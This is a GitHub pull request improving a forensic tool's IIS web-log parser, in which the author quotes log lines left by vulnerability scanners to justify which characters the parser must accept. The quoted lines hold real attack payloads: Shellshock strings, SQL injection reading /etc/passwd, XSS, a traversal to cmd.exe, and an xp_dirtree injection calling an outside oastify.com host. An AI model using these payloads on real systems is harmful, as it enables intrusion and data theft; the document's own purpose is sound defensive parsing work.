Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Further IIS parsing improvements #4921

Open
wants to merge 1 commit into
base: main
Choose a base branch
from
Open

Further IIS parsing improvements #4921

wants to merge 1 commit into from

Conversation

pyllyukko
Copy link
Contributor

Ran a few scanners against vanilla IIS running in Windows Server 2022 and made sure everything parses.

Details:

Iteration 1

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 20 "2024-11-11 18:59:21
                     10.0.2.15 GET /1UNkBV0Q.* - 80 - 10.0.2.15
                     Mozilla/5.0+(W..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/evidences/u_ex241111.log
--------------------------------------------------------------------------------

Add * to _URI_SAFE_CHARACTERS.

Iteration 2

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 49 "2024-11-11 18:59:21
                     10.0.2.15 GET /1UNkBV0Q.php~ - 80 - 10.0.2.15
                     Mozilla/5.0..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/u_ex241111.log
--------------------------------------------------------------------------------

Add ~ to _URI_SAFE_CHARACTERS.

Iteration 3

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 179 "2024-11-11 18:59:21
                     10.0.2.15 GET /1UNkBV0Q.bat|dir - 80 - 10.0.2.15
                     Mozilla/..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/u_ex241111.log
--------------------------------------------------------------------------------

Add | to _URI_SAFE_CHARACTERS.

Iteration 4

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 802 "2024-11-11 18:59:21
                     10.0.2.15 GET / - 80 - 10.0.2.15
                     ()+{+:;+};+echo+93e4r0-C..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/u_ex241111.log
--------------------------------------------------------------------------------

Request:

2024-11-11 18:59:21 10.0.2.15 GET       /           -            80     -           10.0.2.15 ()+{+:;+};+echo+93e4r0-CVE-2014-6271:+true;echo;echo; ()+{+_;+}+>_[$($())]+{+echo+93e4r0-CVE-2014-6278:+true;+echo;echo;+} 200       0            0               0
date       time     s-ip      cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip      cs(User-Agent)                                        cs(Referer)                                                          sc-status sc-substatus sc-win32-status time-taken
  • Add []<>{}$ to _URI_SAFE_CHARACTERS
    • Remove [] from _UA
    • Remove $ from _URI_STEM
    • Remove {} from _COOKIE
    • Remove {}|, ~[], <> & $ from _QUERY

Iteration 5

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 1328 "2024-11-11 18:59:21
                     10.0.2.15 GET
                     /site/'+UNION+ALL+SELECT+FileToClob('/etc/p..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/u_ex241111.log
--------------------------------------------------------------------------------

Request:

2024-11-11 18:59:21 10.0.2.15 GET       /site/'+UNION+ALL+SELECT+FileToClob('/etc/passwd','server')::html,0+FROM+sysusers+WHERE+username=USER+--/.html -            80     -           10.0.2.15 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/74.0.3729.169+Safari/537.36 -           404       0            2               0
date       time     s-ip      cs-method cs-uri-stem                                                                                                    cs-uri-query s-port cs-username c-ip      cs(User-Agent)                                                                                                      cs(Referer) sc-status sc-substatus sc-win32-status time-taken
  • Added \' to _URI_SAFE_CHARACTERS
    • Remove \' from _QUERY

Iteration 6

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 1517 "2024-11-11 18:59:21
                     10.0.2.15 GET /<script>alert("xss")</script>/index.html
                     -..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/u_ex241111.log
--------------------------------------------------------------------------------
  • Added " to _URI_SAFE_CHARACTERS
    • Removed " from _COOKIE
    • Removed " from _QUERY

Iteration 7

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 1546 "2024-11-11 18:59:21
                     10.0.2.15 GET /chat/!nicks.txt - 80 - 10.0.2.15
                     Mozilla/5..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/u_ex241111.log
--------------------------------------------------------------------------------

Added ! to _URI_SAFE_CHARACTERS

Iteration 8

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 2555 "2024-11-11 18:59:21
                     10.0.2.15 GET /forum.asp
                     n=%60/etc/passwd%60|41|80040e14|..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/u_ex241111.log
--------------------------------------------------------------------------------

Request:

date       time     s-ip      cs-method cs-uri-stem cs-uri-query                                                                                                                s-port cs-username c-ip      cs(User-Agent)                                                                                                      cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-11-11 18:59:21 10.0.2.15 GET       /forum.asp  n=%60/etc/passwd%60|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;. 80     -           10.0.2.15 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/74.0.3729.169+Safari/537.36 -           404       0            2               0
  • Added "`" to _URI_SAFE_CHARACTERS
    • Removed it from _QUERY
  • Added # to _URI_SAFE_CHARACTERS

Iteration 9

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 3215 "2024-11-11 18:59:21
                     10.0.2.15 GET /certsrv/..À¯../winnt/system32/cmd.exe
                     /c+d..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/u_ex241111.log
--------------------------------------------------------------------------------

Request:

2024-11-11 18:59:21 10.0.2.15 GET /certsrv/..À¯../winnt/system32/cmd.exe /c+dir 80 - 10.0.2.15 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/74.0.3729.169+Safari/537.36 - 404 0 2 0

Added À¯ to _URI_SAFE_CHARACTERS

Iteration 10

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 6417 "2024-11-11 18:59:21
                     10.0.2.15 GET /administraçao.php - 80 - 10.0.2.15
                     Mozill..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/u_ex241111.log
--------------------------------------------------------------------------------

Added ç to _URI_SAFE_CHARACTERS

Iteration 11

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 6443 "2024-11-11 18:59:21
                     10.0.2.15 GET /adminisztrátora.php - 80 - 10.0.2.15
                     Mozi..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/u_ex241111.log
--------------------------------------------------------------------------------

Added ¡ to _URI_SAFE_CHARACTERS

Iteration 12

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 8170 "2024-11-11 18:59:21
                     10.0.2.15 GET / - 80 - 10.0.2.15
                     Mozilla/5.0+(X11;+Linux+..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/u_ex241111.log
--------------------------------------------------------------------------------

Request:

2024-11-11 18:59:21 10.0.2.15 GET       /           -            80     -           10.0.2.15 Mozilla/5.0+(X11;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0;declare+@q+varchar(99);set+@q='\\4w1vx73x693ltlawm13122r0wr2kqae14pzcp0e.oasti'+'fy.com\inx';+exec+master.dbo.xp_dirtree+@q;-- -           200       0            0               0
date       time     s-ip      cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip      cs(User-Agent)                                                                                                                                                                                        cs(Referer) sc-status sc-substatus sc-win32-status time-taken
  • Added @\\ to _UA

Iteration 13

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 8209 "2024-11-11 18:59:21
                     10.0.2.15 GET / - 80 - 10.0.2.15
                     Mozilla/5.0+(X11;+Linux+..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/u_ex241111.log
--------------------------------------------------------------------------------

Request:

2024-11-11 18:59:21 10.0.2.15 GET       /           -            80     -           10.0.2.15 Mozilla/5.0+(X11;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 https://example.com/;declare+@q+varchar(99);set+@q='\\y21p319rc39fzfgqsv9v8wxu2l8ew4kvaj56wul.oasti'+'fy.com\zmv';+exec+master.dbo.xp_dirtree+@q;-- 200       0            0               0
date       time     s-ip      cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip      cs(User-Agent)                                                         cs(Referer)                                                                                                                                         sc-status sc-substatus sc-win32-status time-taken
  • Moved @\\ to _URI_SAFE_CHARACTERS
    • Removed from _UA, _COOKIE & _QUERY

Everything parses now.

************************* Events generated per parser **************************
Parser (plugin) name : Number of events
--------------------------------------------------------------------------------
            filestat : 3
              winiis : 8312
               Total : 8315
--------------------------------------------------------------------------------

@joachimmetz
Copy link
Member

@pyllyukko thanks for flagging, I'll take a closer look when time permits.

Added ç to _URI_SAFE_CHARACTERS

this looks like IIS handling Unicode characters in a non-URI safe manner, adding individual characters is going to be a whack-a-mole approach.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
2 participants
@pyllyukko @joachimmetz